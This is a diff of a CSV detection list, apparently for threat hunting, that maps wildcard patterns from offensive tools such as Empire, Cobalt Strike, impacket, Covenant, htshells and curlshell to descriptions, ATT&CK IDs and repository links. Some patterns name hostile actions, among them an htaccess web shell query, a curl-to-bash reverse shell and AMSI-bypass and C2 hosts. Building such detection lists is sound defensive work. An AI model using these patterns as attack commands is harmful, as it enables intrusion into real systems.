Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*httpntlm.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httpntlm.old*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httppayload.bin*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*HttpProxyScan_Log4J2.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*http-redwarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*http-redwarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*httprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*httprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*httprelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*httprelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httprelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*http-request-smuggler-all.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*https://*/.htaccess?c=cmd*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*https://*/.htaccess?c=uname -a*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" -"*https://*/releases/download/*/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*https://*/releases/download/*/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*https://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*https://0.0.0.0:1337*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*https://127.0.0.1:7443*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*https://127.0.0.1:7443*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*https://127.0.0.1:7443*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*https://127.0.0.1:7443*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*https://amsi.fail/*","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*https://avred.r00ted.ch/upload*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*https://crackstation.net/*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" -"*https://curlshell:* | bash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*https://avred.r00ted.ch/upload*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*https://crackstation.net/*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*https://curlshell:* | bash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*https://cyseclabs.com/exploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*https://dnsdumpster.com/*","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" -"*https://ffuf.io.fi*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*https://ffuf.io/FUZZ*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*https://github.com/bitsadmin/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*https://ffuf.io.fi*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*https://ffuf.io/FUZZ*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*https://github.com/bitsadmin/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*https://gitlab.com/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://kali.download/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*https://localhost:7443/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*https://pastebin.com/raw/fevFJe98*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*https://localhost:7443/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*https://pastebin.com/raw/fevFJe98*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*https://t.me/BotFather*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" "*https://t.me/machine1337*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" "*https://web.archive.org/*https://www.kernel-exploits.com/media/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*https://wfuzz.readthedocs.io*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*https://www.myget.org/F/fireeye/api/v2*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable 